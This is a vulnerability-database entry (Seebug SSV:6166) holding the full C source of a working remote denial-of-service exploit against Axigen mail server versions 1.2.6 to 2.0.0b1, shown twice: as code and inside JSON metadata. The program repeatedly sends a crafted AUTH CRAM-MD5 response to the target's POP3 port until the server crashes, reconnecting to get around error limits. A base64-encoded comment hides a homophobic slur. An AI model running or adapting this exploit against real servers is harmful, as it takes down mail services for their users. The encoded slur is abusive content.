ID SSV:6166
Type seebug
Reporter Root
Modified 2007-02-09T00:00:00
Description
No description provided by source.
/* doaxigen.c
*
* axigen 1.2.6 - 2.0.0b1 DoS (x86-lnx)
* by mu-b - Sat Oct 22 2006
*
* - Tested on: AXIGEN 1.2.6 (lnx)
* AXIGEN 2.0.0b1 (lnx)
*
* 0x08088054: parsing error results in DoS (little-endian, confirmed)
* DoS + off-by-one heap smash (big-endian)
*
* Note: if you receive a SIGPIPE then you crashed the server
* but at too high a memory address... try again.
*/
/* dGFicyBhcmUgZm9yIGZhZ2dvdHNcIQ== */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#define BUF_SIZE 1024
#define BBUF_SIZE BUF_SIZE/3*4+1
#define AUTH_CMD "AUTH CRAM-MD5\r\n"
#define QUIT_CMD "QUIT\r\n"
#define DEF_PORT 110
#define PORT_POP3 DEF_PORT
#define RCNT_DELAY 3
static const char base64tab[] =
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
static int base64 (const u_char * ibuf, u_char * obuf, size_t n);
static int sock_send (int sock, u_char * src, int len);
static int sock_recv (int sock, u_char * dst, int len);
static void zhammer (u_char * host);
static int
base64 (const u_char * ibuf, u_char * obuf, size_t n)
{
int a, b, c;
int i, j;
int d, e, f, g;
a = b = c = 0;
for (j = i = 0; i < n; i += 3)
{
a = (u_char) ibuf[i];
b = i + 1 < n ? (u_char) ibuf[i + 1] : 0;
c = i + 2 < n ? (u_char) ibuf[i + 2] : 0;
d = base64tab[a >> 2];
e = base64tab[((a & 3) << 4) | (b >> 4)];
f = base64tab[((b & 15) << 2) | (c >> 6)];
g = base64tab[c & 63];
if (i + 1 >= n)
f = '=';
if (i + 2 >= n)
g = '=';
obuf[j++] = d, obuf[j++] = e;
obuf[j++] = f, obuf[j++] = g;
}
obuf[j++] = '\0';
return strlen (obuf);
}
static int
sock_send (int sock, u_char * src, int len)
{
int sbytes;
sbytes = send (sock, src, len, 0);
return (sbytes);
}
static int
sock_recv (int sock, u_char * dst, int len)
{
int rbytes;
rbytes = recv (sock, dst, len, 0);
if (rbytes >= 0)
dst[rbytes] = '\0';
return (rbytes);
}
static int
sockami (u_char * host, int port)
{
struct sockaddr_in address;
struct hostent *hp;
int sock;
fflush (stdout);
if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1)
{
perror ("socket()");
exit (-1);
}
if ((hp = gethostbyname (host)) == NULL)
{
perror ("gethostbyname()");
exit (-1);
}
memset (&address, 0, sizeof (address));
memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
address.sin_family = AF_INET;
address.sin_port = htons (port);
if (connect (sock, (struct sockaddr *) &address, sizeof (address)) == -1)
{
perror ("connect()");
exit (EXIT_FAILURE);
}
return (sock);
}
static void
zhammer (u_char * host)
{
int sock, rbytes;
u_int i;
u_char *md5 = "\" d339490346794f964736669ae26e29df"; /* what was that? */
u_char sbuf[BBUF_SIZE], *sptr;
u_char rbuf[BUF_SIZE];
fd_set r_fds;
struct timeval tv;
base64 (md5, sbuf, strlen (md5));
sptr = sbuf + strlen (sbuf);
*sptr++ = '\r', *sptr++ = '\n', *sptr = '\0';
printf ("+Connecting to %s:%d.", host, PORT_POP3);
sock = sockami (host, PORT_POP3);
rbytes = sock_recv (sock, rbuf, sizeof (rbuf) - 1);
if (rbytes < 0)
return;
for (i = 0; i < -1; i++)
{
int rbytes;
sock_send (sock, AUTH_CMD, strlen (AUTH_CMD));
rbytes = sock_recv (sock, rbuf, sizeof (rbuf) - 1);
if (rbytes < 0)
break;
sock_send (sock, sbuf, strlen (sbuf));
FD_ZERO (&r_fds);
FD_SET (sock, &r_fds);
tv.tv_sec = 4; /* wait 4 seconds */
tv.tv_usec = 0;
rbytes = select (sock + 1, &r_fds, NULL, NULL, &tv);
if (rbytes == -1) /* oh dear */
perror ("select()");
else if (rbytes) /* read response */
rbytes = sock_recv (sock, rbuf, sizeof (rbuf) - 1);
else /* timeout, server appears to have crashed!@$%! */
break;
/* hmmm, too many attempts, must re-connect... */
if (strstr (rbuf, "(maximum number of protocol errors reached)"))
{
close (sock);
sleep (RCNT_DELAY);
printf ("\n+Reconnecting to %s:%d.", host, PORT_POP3);
sock = sockami (host, PORT_POP3);
rbytes = sock_recv (sock, rbuf, sizeof (rbuf) - 1);
}
if (rbytes < 0)
break;
if (!((i + 1) % 4))
printf ("..%d", i + 1);
fflush (stdout);
usleep (1000);
}
printf ("\n");
}
int
main (int argc, char **argv)
{
printf ("axigen 1.2.6 - 2.0.0b1 DoS POC\n"
"by: <mu-b@digit-labs.org>, <mu-b@65535.com>\n\n");
if (argc <= 1)
{
fprintf (stderr, "Usage: %s <host>\n", argv[0]);
exit (EXIT_SUCCESS);
}
zhammer (argv[1]);
printf ("+Wh00t!\n");
return (EXIT_SUCCESS);
}
{"href": "https://www.seebug.org/vuldb/ssvid-6166", "status": "poc", "bulletinFamily": "exploit", "modified": "2007-02-09T00:00:00", "title": "Axigen <= 2.0.0b1 Remote Denial of Service Exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-6166", "cvelist": [], "description": "No description provided by source.", "viewCount": 1, "published": "2007-02-09T00:00:00", "sourceData": "\n /* doaxigen.c\r\n *\r\n * axigen 1.2.6 - 2.0.0b1 DoS (x86-lnx)\r\n * by mu-b - Sat Oct 22 2006\r\n *\r\n * - Tested on: AXIGEN 1.2.6 (lnx)\r\n * AXIGEN 2.0.0b1 (lnx)\r\n *\r\n * 0x08088054: parsing error results in DoS (little-endian, confirmed)\r\n * DoS + off-by-one heap smash (big-endian)\r\n *\r\n * Note: if you receive a SIGPIPE then you crashed the server\r\n * but at too high a memory address... try again.\r\n */\r\n\r\n/* dGFicyBhcmUgZm9yIGZhZ2dvdHNcIQ== */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <netinet/in.h>\r\n#include <netdb.h>\r\n#include <sys/time.h>\r\n#include <sys/types.h>\r\n\r\n#define BUF_SIZE 1024\r\n#define BBUF_SIZE BUF_SIZE/3*4+1\r\n\r\n#define AUTH_CMD "AUTH CRAM-MD5\\r\\n"\r\n#define QUIT_CMD "QUIT\\r\\n"\r\n\r\n#define DEF_PORT 110\r\n#define PORT_POP3 DEF_PORT\r\n\r\n#define RCNT_DELAY 3\r\n\r\nstatic const char base64tab[] =\r\n "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";\r\n\r\nstatic int base64 (const u_char * ibuf, u_char * obuf, size_t n);\r\nstatic int sock_send (int sock, u_char * src, int len);\r\nstatic int sock_recv (int sock, u_char * dst, int len);\r\nstatic void zhammer (u_char * host);\r\n\r\nstatic int\r\nbase64 (const u_char * ibuf, u_char * obuf, size_t n)\r\n{\r\n int a, b, c;\r\n int i, j;\r\n int d, e, f, g;\r\n\r\n a = b = c = 0;\r\n for (j = i = 0; i < n; i += 3)\r\n {\r\n a = (u_char) ibuf[i];\r\n b = i + 1 < n ? (u_char) ibuf[i + 1] : 0;\r\n c = i + 2 < n ? (u_char) ibuf[i + 2] : 0;\r\n\r\n d = base64tab[a >> 2];\r\n e = base64tab[((a & 3) << 4) | (b >> 4)];\r\n f = base64tab[((b & 15) << 2) | (c >> 6)];\r\n g = base64tab[c & 63];\r\n\r\n if (i + 1 >= n)\r\n f = '=';\r\n if (i + 2 >= n)\r\n g = '=';\r\n\r\n obuf[j++] = d, obuf[j++] = e;\r\n obuf[j++] = f, obuf[j++] = g;\r\n }\r\n\r\n obuf[j++] = '\\0';\r\n\r\n return strlen (obuf);\r\n}\r\n\r\nstatic int\r\nsock_send (int sock, u_char * src, int len)\r\n{\r\n int sbytes;\r\n\r\n sbytes = send (sock, src, len, 0);\r\n\r\n return (sbytes);\r\n}\r\n\r\nstatic int\r\nsock_recv (int sock, u_char * dst, int len)\r\n{\r\n int rbytes;\r\n\r\n rbytes = recv (sock, dst, len, 0);\r\n if (rbytes >= 0)\r\n dst[rbytes] = '\\0';\r\n\r\n return (rbytes);\r\n}\r\n\r\nstatic int\r\nsockami (u_char * host, int port)\r\n{\r\n struct sockaddr_in address;\r\n struct hostent *hp;\r\n int sock;\r\n\r\n fflush (stdout);\r\n if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1)\r\n {\r\n perror ("socket()");\r\n exit (-1);\r\n }\r\n\r\n if ((hp = gethostbyname (host)) == NULL)\r\n {\r\n perror ("gethostbyname()");\r\n exit (-1);\r\n }\r\n\r\n memset (&address, 0, sizeof (address));\r\n memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);\r\n address.sin_family = AF_INET;\r\n address.sin_port = htons (port);\r\n\r\n if (connect (sock, (struct sockaddr *) &address, sizeof (address)) == -1)\r\n {\r\n perror ("connect()");\r\n exit (EXIT_FAILURE);\r\n }\r\n\r\n return (sock);\r\n}\r\n\r\nstatic void\r\nzhammer (u_char * host)\r\n{\r\n int sock, rbytes;\r\n u_int i;\r\n u_char *md5 = "\\" d339490346794f964736669ae26e29df"; /* what was that? */\r\n u_char sbuf[BBUF_SIZE], *sptr;\r\n u_char rbuf[BUF_SIZE];\r\n\r\n fd_set r_fds;\r\n struct timeval tv;\r\n\r\n base64 (md5, sbuf, strlen (md5));\r\n sptr = sbuf + strlen (sbuf);\r\n *sptr++ = '\\r', *sptr++ = '\\n', *sptr = '\\0';\r\n\r\n printf ("+Connecting to %s:%d.", host, PORT_POP3);\r\n sock = sockami (host, PORT_POP3);\r\n rbytes = sock_recv (sock, rbuf, sizeof (rbuf) - 1);\r\n if (rbytes < 0)\r\n return;\r\n\r\n for (i = 0; i < -1; i++)\r\n {\r\n int rbytes;\r\n\r\n sock_send (sock, AUTH_CMD, strlen (AUTH_CMD));\r\n rbytes = sock_recv (sock, rbuf, sizeof (rbuf) - 1);\r\n if (rbytes < 0)\r\n break;\r\n\r\n sock_send (sock, sbuf, strlen (sbuf));\r\n\r\n FD_ZERO (&r_fds);\r\n FD_SET (sock, &r_fds);\r\n tv.tv_sec = 4; /* wait 4 seconds */\r\n tv.tv_usec = 0;\r\n\r\n rbytes = select (sock + 1, &r_fds, NULL, NULL, &tv);\r\n if (rbytes == -1) /* oh dear */\r\n perror ("select()");\r\n else if (rbytes) /* read response */\r\n rbytes = sock_recv (sock, rbuf, sizeof (rbuf) - 1);\r\n else /* timeout, server appears to have crashed!@$%! */\r\n break;\r\n\r\n /* hmmm, too many attempts, must re-connect... */\r\n if (strstr (rbuf, "(maximum number of protocol errors reached)"))\r\n {\r\n close (sock);\r\n sleep (RCNT_DELAY);\r\n\r\n printf ("\\n+Reconnecting to %s:%d.", host, PORT_POP3);\r\n sock = sockami (host, PORT_POP3);\r\n rbytes = sock_recv (sock, rbuf, sizeof (rbuf) - 1);\r\n }\r\n\r\n if (rbytes < 0)\r\n break;\r\n\r\n if (!((i + 1) % 4))\r\n printf ("..%d", i + 1);\r\n\r\n fflush (stdout);\r\n usleep (1000);\r\n }\r\n\r\n printf ("\\n");\r\n}\r\n\r\nint\r\nmain (int argc, char **argv)\r\n{\r\n printf ("axigen 1.2.6 - 2.0.0b1 DoS POC\\n"\r\n "by: <mu-b@digit-labs.org>, <mu-b@65535.com>\\n\\n");\r\n\r\n if (argc <= 1)\r\n {\r\n fprintf (stderr, "Usage: %s <host>\\n", argv[0]);\r\n exit (EXIT_SUCCESS);\r\n }\r\n\r\n zhammer (argv[1]);\r\n\r\n printf ("+Wh00t!\\n");\r\n\r\n return (EXIT_SUCCESS);\r\n}\n ", "id": "SSV:6166", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T22:10:23", "reporter": "Root", "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2017-11-19T22:10:23", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T22:10:23", "rev": 2}, "vulnersScore": 0.5}, "references": []}
{}
